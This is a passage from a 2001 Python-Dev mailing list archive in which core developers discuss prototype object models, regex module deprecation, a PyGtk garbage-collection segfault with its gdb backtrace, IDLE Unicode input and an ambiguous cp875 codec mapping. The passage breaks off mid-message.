(MET DST) Subject: [Python-Dev] Type/class Message-ID: <200105111456.QAA00228@core.inf.ethz.ch> Hi.
> > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes. > I agree; I often read that Smalltalk is "simple" up to metaclasses. On the other hand, the casual user can just ignore them. > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) > [Ignoring the fact that code and changes require coders] Thinking in terms of proto-objects, parent slots and list parent slots: a Python instance I has data slots and a parent slot __class__; a Python class C has data slots and a list parent slot __bases__. Then we have the Python rules (not very uniform): function from I directly => function; function from I.__class__ => bound method; function from C => unbound method. That's the difficult part for every model that aims to remain compatible. Samuele Pedroni. From thomas.heller at ion-tof.com Fri May 11 17:40:10 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Fri, 11 May 2001 17:40:10 +0200 Subject: [Python-Dev] Type/class References: Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> > Reading up on MetaClasses in Smalltalk again makes me appreciate > the simplicity of a prototype system where everything is just > an object -- all objects can be cloned, and some objects are > only used for cloning -- they are the exemplars of their type > which fill the role of Classes.
> > Unfortunately, although prototypes would be a lot simpler, it > would be a pretty incompatible change for Python -- I can't think > of any way to get there without a lot of breakage. > > (Still -- I wonder if there's a way they could be used under > the covers in the implementation to make it simpler. Prototype > semantics are basically a superset of Class based semantics, which > is how it was easy to do Smalltalk in Self.) I never looked at Self or other prototype based systems. Is it really true that prototypes are a lot simpler than metaclasses, but on the other hand more powerful? The 'brain exploding properties' of metaclasses are IMO only there because my brain cannot think easily in too many recursion steps... Thomas From fdrake at acm.org Fri May 11 18:25:54 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 12:25:54 -0400 (EDT) Subject: [Python-Dev] status of pre? Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Have we formulated a plan of action regarding PCRE and the pre module? Are we planning to leave them in for another version, or is SRE considered sufficiently stable? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From sdm7g at Virginia.EDU Fri May 11 18:29:30 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 12:29:30 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Message-ID: On Fri, 11 May 2001, Fred L. Drake, Jr. wrote: > > Martin v. Loewis writes: > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > > years? > > Yikes! I just search developer.apple.com for "chdir" and came up > with no hits, but I really don't know just what that tells me. > chdir() is required for POSIX compliance, but it isn't mentioned in > the C9X final committee draft. 
There isn't a chdir in any of the pre-OSX Mac *system* libraries, and Mac has never claimed any POSIX compliance (even with OSX, they have officially said it's almost certainly POSIX compliant but they have no plans for now to go thru the hoops and paperwork to get it certified.) chdir is in unistd.h, which isn't part of the standard C library. However, Metrowerks *compiler* and IDE for the Mac does include in MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW selling development tools obviously has more interest in being POSIX compliant than Apple! ) I don't know if there's one in the MPW libraries, so maybe you still want to leave it there. -- Steve Majewski From guido at digicool.com Fri May 11 20:47:38 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 13:47:38 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400." <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com> > Have we formulated a plan of action regarding PCRE and the pre > module? Are we planning to leave them in for another version, or is > SRE considered sufficiently stable? Hm. It should disappear but I believe I've heard people say they were forced to use it because of the recursion limit problems with SRE on some platforms. We could put a warning on using pre or pcre in 2.2, and remove it in 2.3, hoping that /F fixes the recursion limit problems in the meantime (weren't those related to the backtracking implementation)?
--Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Fri May 11 22:41:30 2001 From: skip at pobox.com (skip at pobox.com) Date: Fri, 11 May 2001 15:41:30 -0500 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <15100.20090.573866.569667@beluga.mojam.com> Has anyone investigated interactions between ExtensionClass objects and GC? I've encountered segfaults with 2.1 in certain situations when using the latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two intersect somewhere. PyGtk provides a Python interface to the Gtk widget set using ExtensionClasses. Any ideas how I should approach the problem? I don't know either piece of code at all and the code that generates the segfault isn't particularly small, not to mention that it uses the bleeding edge Gtk stuff (which I doubt anyone on this list will have installed) and a version of ExtensionClass patched by James Henstridge, the PyGtk author. Here's what I know:
1. Disabling gc gets rid of the segfault.
2. I only see the problem when importing a specific module that subclasses the GtkTextView widget from the Python command line. If I run it as a script from the shell prompt, I get no segfault.
3. If I first import the gtk module, then import my module, I get no segfault.
4. Most changes I make to the module causing the problem cause the problem to disappear.
All told, all this really tells me is I'm probably dealing with a malloc/free problem of some sort. Neil and/or Jim (and/or anyone else willing to look into this problem), I can give you access to my development machine via ssh if you think that would help debug the problem.
Skip #0 0x0807163d in visit_decref (op=0x4034ece0, data=0x0) at ../Modules/gcmodule.c:153 #1 0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 , arg=0x0) at ../Objects/tupleobject.c:366 #2 0x08071672 in subtract_refs (containers=0x80b8ac0) at ../Modules/gcmodule.c:167 #3 0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc) at ../Modules/gcmodule.c:379 #4 0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484 #5 0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507 #6 0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149 #7 0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244 #8 0x401f0979 in initializeBaseExtensionClass (self=0x4034d320) at ExtensionClass.c:1485 #9 0x401f6774 in export_subclassed_type (dict=0x82d33a4, name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4) at ExtensionClass.c:3410 #10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, class_name=0x40337c55 "GtkTreeViewColumn", get_type=0x404c4080 , ec=0x4034d320, bases=0x82ea9a4) at gobjectmodule.c:202 #11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071 #12 0x402f0ed0 in init_gtk () at gtkmodule.c:98 #13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52 #14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", type=3) at ../Python/import.c:1296 #15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815 #16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc) at ../Python/import.c:1671 #17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522 #18 
0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1563 #19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124) at ../Python/bltinmodule.c:31 #20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2838 #21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2801 #22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734 #23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, locals=0x8295f1c) at ../Python/ceval.c:346 #25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", co=0x82910d0, pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490 #26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754 #27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", type=1) at ../Python/import.c:1287 #28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk") at ../Python/import.c:811 #29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5) at ../Python/import.c:1310 #30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815 #31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac) at ../Python/import.c:1671 #32 0x08067bcc in 
import_module_ex (name=0x0, globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522 #33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1563 #34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c) at ../Python/bltinmodule.c:31 #35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2838 #36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2801 #37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734 #38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, locals=0x828c3fc) at ../Python/ceval.c:346 #40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490 #41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754 #42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287 #43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", fullname=0xbfffeff0 "seg") at ../Python/import.c:1815 #44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec) at ../Python/import.c:1671 #45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522 #46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1563 #47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4) at 
../Python/bltinmodule.c:31 #48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2838 #49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2801 #50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734 #51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0, closure=0x0) at ../Python/ceval.c:1820 #52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, locals=0x80d21e4) at ../Python/ceval.c:346 #53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "", globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708) at ../Python/pythonrun.c:1045 #54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:570 #55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, filename=0x80a496d "", flags=0xbffff708) at ../Python/pythonrun.c:510 #56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, filename=0x80a496d "", closeit=0, flags=0xbffff708) at ../Python/pythonrun.c:473 #57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320 #58 0x400831f0 in __libc_start_main () from /lib/libc.so.6 From guido at digicool.com Fri May 11 23:49:00 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 16:49:00 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST." <15100.20090.573866.569667@beluga.mojam.com> References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com> > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. The gdb traceback (appended) sort of suggests the two > intersect somewhere. 
PyGtk provides a Python interface to the Gtk widget > get using ExtensionClasses. Any ideas how I should approach the problem? I > don't know either piece of code at all and the code that generates the > segfault isn't particularly small, not to mention which it uses the bleeding > edge Gtk stuff (which I doubt anyone on this list will have installed) and a > version of ExtensionClass patched by James Henstridge, the PyGtk author. > > Here's what I know: > > 1. Disabling gc gets rid of the segfault > 2. I only see the problem with importing a specific module that > subclasses the GtkTextView widget from the Python command line. If I > run it as a script from the shell prompt, I get no segfault. > 3. If I first import the gtk module, then import my module, I get no > segfault. > 4. Most changes I make to the module causing the problem cause the > problemm to disappear. > > All told, all this really tells me is I'm probably dealing with a > malloc/free problem of some sort. > > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. AFAIK, the latest version of Zope (which uses ExtensionClass extensively if not exclusively :-) works fine with Python 2.1. This suggests pointing a finger towards the PyGtk code... :-( --Guido van Rossum (home page: http://www.python.org/~guido/) From loewis at informatik.hu-berlin.de Fri May 11 22:53:55 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Fri, 11 May 2001 22:53:55 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Thanks to a bug report I got, I noticed for the first time that you cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell prompt, you may get >>> s='??' 
UnicodeError: ASCII encoding error: ordinal not in range(128) Likewise, when trying to save a file that has non-ASCII characters, you get a traceback. Now, I think I understand all the causes of the problem (Tkinter returning Unicode objects, and so on). However, I'm curious whether anybody has proposals on how to deal with it. For saving text files, if Python had an encoding directive, things might be easier :-) For the shell prompt, I've no idea how to solve this best. So any suggestions are welcome. Regards, Martin From fredrik at pythonware.com Sat May 12 00:18:27 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 00:18:27 +0200 Subject: [Python-Dev] status of pre? References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid> guido wrote: > > We could put a warning on using pre or pcre in 2.2, and remove it in > 2.3, hoping that /F fixes the recursion limit problems in the mean > time (weren't those related to the backtracking implementation)? 2.2 is to be released in october, right? I'm sure I could shake out the remaining bugs in my "stackless SRE" patch until then... Cheers /F From fredrik at effbot.org Sat May 12 01:03:10 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:03:10 +0200 Subject: [Python-Dev] Hats off to them! Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid> http://www.theregister.co.uk/content/4/18909.html "Microsoft Altair BASIC legend talks about Linux, CPRM and that very frightening photo ... His other passion, he tells us, is Python. "Hats off to them. It's an extremely well designed language. It's object orientated from the get-go. They've really succeeded there," he says, and commends it as the ideal teaching language. That used to be BASIC, of course" ... 
(no, it's not Bill) Cheers /F From fredrik at effbot.org Sat May 12 01:14:47 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:14:47 +0200 Subject: [Python-Dev] Hats off to them! References: <014a01c0da6e$93578ca0$e46940d5@hagrid> Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid> > "Hats off to them. It's an extremely well designed language. It's > object orientated from the get-go. They've really succeeded there," > he says, and commends it as the ideal teaching language. That > used to be BASIC, of course" reading on, I'm not sure why BASIC ever was the ideal teaching language: http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11 "One of the nice things about this BASIC is it has this so called direct mode. So you can PRINT 2 + 2. It prints the square root of ten" Cheers /F From sdm7g at Virginia.EDU Sat May 12 04:43:31 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 22:43:31 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> Message-ID: On Fri, 11 May 2001, Thomas Heller wrote: > I never looked at Self or other prototype based systems. > Is it really true that prototypes are a lot simpler than > metaclasses, but on the other hand more powerful? Definitely simpler: No classes, No metaclasses, only objects. Ignore for now the fact that a limited set of classes are handier for a statically type checked language and just consider dynamic languages, which is their proper domain. Prototype semantics basically subsume class semantics. Any object can be an exemplar and fill the role of a class, and it can be used ONLY as a template and holder of shared behaviour, so it can be used like a class. [One of the Self papers -- one which I haven't read -- is entitled "Self includes Smalltalk" -- and is, I believe, a demonstration that Smalltalk is sort of a subset of Self.] But you can also have finer-grained classification and you can have object inheritance.
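A minimal sketch of the delegation model described here, assuming a hypothetical `Proto` class (not part of Python or any library). Each object holds its own slots plus an ordered tuple of parents. A lookup that misses falls through to the parents depth-first, left to right, and a function found anywhere on the chain is bound to the original receiver. An exemplar that is only ever cloned plays the role of a class, and clones of clones give object inheritance.

```python
import types


class Proto:
    """Hypothetical prototype object: its own slots plus an ordered tuple of parents."""

    def __init__(self, *parents, **slots):
        # Bypass our own __setattr__ while building the internal state.
        object.__setattr__(self, "_parents", parents)
        object.__setattr__(self, "_slots", dict(slots))

    def _find(self, name):
        # Own slots first, then each parent depth-first, left to right.
        if name in self._slots:
            return self._slots[name]
        for parent in self._parents:
            try:
                return parent._find(name)
            except AttributeError:
                pass
        raise AttributeError(name)

    def __getattr__(self, name):
        # Reached only when ordinary lookup fails, i.e. for slot names.
        value = self._find(name)
        if isinstance(value, types.FunctionType):
            # Bind to the receiver, not to the prototype that holds the function.
            return types.MethodType(value, self)
        return value

    def __setattr__(self, name, value):
        # Assignment always creates or overwrites a slot on the receiver itself.
        self._slots[name] = value

    def clone(self, **slots):
        # The clone delegates everything it does not override to self.
        return Proto(self, **slots)


# An exemplar used only for cloning fills the role of a class.
point = Proto(x=0, y=0, norm2=lambda self: self.x ** 2 + self.y ** 2)
p = point.clone(x=3, y=4)   # p's parent is point
q = p.clone(y=0)            # q inherits x from p and norm2 from point
labelled = Proto(label="unnamed", describe=lambda self: f"{self.label}: {self.norm2()}")
r = Proto(q, labelled, label="r")  # two parents, searched left to right

print(p.norm2(), q.norm2(), r.describe())  # 25 9 r: 9
```

Because `q` holds a live link to `p`, a later assignment such as `p.x = 6` changes what `q.norm2()` returns.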
( This is handy in XlispStat, which is oriented towards statistics and analysis: you can have derived objects, for example different subsamples of the same population, or in my app, different energy spectra, along with derived and processed spectra with special rules for treatment: e.g. linearly filtered spectra have a filter function or kernel, and if they are fit against reference spectra, they need to be fit against references that have had the same filter applied to them -- if none is available, create one from unfiltered samples -- and maybe a whole chain of derived data. In a class based system, you would have to manually maintain a separate linked list of objects, but in a prototype system they can all be cloned from their parent objects. ) The other plus for things like exploratory statistics is that you don't have to design a class hierarchy ahead of time -- it's more concrete and less abstract than a class based system. Prototypes can also solve some of the sorts of problems that Jim Fulton's acquisition framework in Zope is designed to handle. (But it's been a while since I read that paper and I haven't used it, so I'm relying on my memory of thinking "Yeah -- that would be simpler with prototypes" ) You definitely don't have to worry about simulating the Prototype Pattern. (I've seen GUI systems in C++ that go thru a lot of code to add prototype-like behavior to C++ classes.) But -- unless I can figure out a useful way to use it under the covers, it's not really a topic for python-dev. > The 'brain exploding properties' of metaclasses are IMO > only there because my brain cannot think easily in too > many recursion steps... It's just like spelling bananana -- the problem is to know when to stop! ;-) -- Steve Majewski From tim_one at email.msn.com Sat May 12 13:28:27 2001 From: tim_one at email.msn.com (Tim Peters) Date: Sat, 12 May 2001 07:28:27 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: I have a way to make dict lookup a teensy bit cheaper(*) that significantly reduces the number of collisions (which is much more valuable). This caused a number of std tests to fail, because they were implicitly relying on the order in which a dict's entries are materialized via .keys() or .items(). Most of these were easy enough to fix. The last failure remaining is test_unicode, and I don't know how to fix it. It's dying here: try: verify(unicode(s,encoding).encode(encoding) == s) except TestFailed: print '*** codec "%s" failed round-trip' % encoding except ValueError,why: print '*** codec for "%s" failed: %s' % (encoding, why) when encoding == "cp875". There's a bogus problem you have to worm around first: test_unicode neglected to import TestFailed, so it actually dies with NameError while trying the "except TestFailed" clause after verify() raises TestFailed. Once that's repaired, it's complaining about failing the round-trip encoding. The original character in s it's griping about is "?" (0x3f). cp875.py has this entry in its decoding_map dict: 0x003f: 0x001a, # SUBSTITUTE But 0x1a is not a *unique* value in this dict. There's also 0x00dc: 0x001a, # SUBSTITUTE 0x00e1: 0x001a, # SUBSTITUTE 0x00ec: 0x001a, # SUBSTITUTE 0x00ed: 0x001a, # SUBSTITUTE 0x00fc: 0x001a, # SUBSTITUTE 0x00fd: 0x001a, # SUBSTITUTE Therefore what appears associated with 0x1a in the derived encoding_map dict: encoding_map = {} for k,v in decoding_map.items(): encoding_map[v] = k may end up being any of the 7 decoding_map keys that map to 0x1a. It just so happened to map back to 0x3f before, but to 0xfd after the dict change, so "?" doesn't survive the round trip anymore. My knowledge of encoding internals is exceeded only by my mastery of file URLs under Windows , so I could sure use some help getting this repaired. I'd really like to check in the dict improvement (+ test repairs), but won't do it so long as it makes a std test fail. 
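The failure can be reproduced without the codec machinery. A minimal sketch, using a toy table in which only the three SUBSTITUTE entries (0x3F, 0xDC, 0xFD) come from the cp875.py excerpt above; the 0x40 (EBCDIC space) entry is illustrative. It detects many-to-one entries and inverts the table deterministically. Letting the lowest byte value win is an assumed policy chosen for illustration, not the codec's actual behaviour.

```python
# Toy decoding table shaped like the cp875 problem: several bytes decode to
# U+001A SUBSTITUTE. 0x40 (EBCDIC space) is the one unambiguous entry.
decoding_map = {
    0x3F: 0x001A,
    0x40: 0x0020,
    0xDC: 0x001A,
    0xFD: 0x001A,
}


def ambiguous_targets(dmap):
    """Map each many-to-one target to the sorted list of bytes that decode to it."""
    sources = {}
    for byte, uni in dmap.items():
        sources.setdefault(uni, []).append(byte)
    return {uni: sorted(bs) for uni, bs in sources.items() if len(bs) > 1}


def build_encoding_map(dmap):
    """Invert dmap so the lowest byte wins every collision, independent of dict order."""
    encoding_map = {}
    # Reverse sorted order: the smallest byte is written last, so it survives.
    for byte, uni in sorted(dmap.items(), reverse=True):
        encoding_map[uni] = byte
    return encoding_map


encoding_map = build_encoding_map(decoding_map)
print(ambiguous_targets(decoding_map))        # {26: [63, 220, 253]}
print(hex(encoding_map[decoding_map[0x3F]]))  # 0x3f, so "?" round-trips
```

The other SUBSTITUTE bytes (0xDC, 0xFD) still cannot round-trip. No inversion can fix that, because the decoding itself discards the distinction.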
If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings winning the game, then iterating over decoding_map.items() in reverse sorted order would do the trick reliably. But I don't know whether the ambiguity in cp875 is a bug or an undocumented feature ... 7-bit-ascii-looks-better-every-day-ly y'rs - tim (*) Simply by taking the damn "~" off "~hash" -- I explained quite a while ago why that can lead to a weak form of clustering "in theory", and instrumenting the dict lookup code confirmed that it does hurt in real life. From guido at digicool.com Sat May 12 14:28:23 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 07:28:23 -0500 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400." References: Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Do prototype-based language have the equivalence of multiple inheritance? --Guido van Rossum (home page: http://www.python.org/~guido/) From tim_one at email.msn.com Sat May 12 14:16:33 2001 From: tim_one at email.msn.com (Tim Peters) Date: Sat, 12 May 2001 08:16:33 -0400 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Just as for class-based languages, whether a prototype-based language supports an MI workalike varies by language. In a class-based language with MI, a class can have multiple base classes; in a prototype-based language with an MI workalike, an object can have multiple prototype objects. The same kinds of ambiguities can arise, and the same kinds of resolution strategies are applicable (imposed linearization; user-supplied qualification; user-supplied renaming; guessing <0.7 wink>). JavaScript is the best-known prototype language that does not support multiple prototypes per object.
A very readable intro to its object model is here: http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf It's interesting because, near the end, the author explores a bit how far you can get *trying* to fake MI in JS. The answer is "farther than you might think", but not all the way. From fredrik at pythonware.com Sat May 12 14:25:43 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 14:25:43 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? References: Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid> tim wrote: > If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings > winning the game, then iterating over decoding_map.items() in reverse sorted > order would do the trick reliably. reverse sorting makes sense to me. but the cp-files appear to be machine generated, so patching that python file won't help. > But I don't know whether the ambiguity in cp875 is a bug or an undocumented > feature ... a truly future-proof solution would be to specify exactly how to resolve every many-to-one mapping, for every font having that problem. but sorting them is clearly better than relying on implementation-dependent behaviour... (is Jython using exactly the same hashing and dictionary algorithms as CPython? or does it work by accident also under Jython?) Cheers /F From nas at python.ca Sat May 12 16:28:54 2001 From: nas at python.ca (Neil Schemenauer) Date: Sat, 12 May 2001 07:28:54 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500 References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <20010512072854.A4271@glacier.fnational.com> skip at pobox.com wrote: > > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. 
Do any of the PyGtk objects define the GC type flag? The GC is fairly good at exposing memory management bugs that otherwise go unnoticed. If you're using glibc you can try setting the MALLOC_CHECK_ environment variable to 2. If you've got lots of memory you could also try using Electric Fence and running your program. Finally, you might try compiling with Py_DEBUG set. > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. I'd be willing to take a look (the chances of me reproducing it don't look good). A public RSA key is attached. Neil 1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas From sdm7g at Virginia.EDU Sat May 12 17:07:06 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 11:07:06 -0400 (EDT) Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Yeah ... What Tim said... Also: There are two basic implementation models: Delegation [a.k.a. "Lifetime sharing", cloning] sort of like python -- if you don't know how to handle it "ask" a parent object. ( "ask" in quotes, because I've recently been in a long argument about whether Objective-C & Smalltalk can really be said to "send messages" , or if it's "just" dynamic lookup and function application! ) Extension [a.k.a.
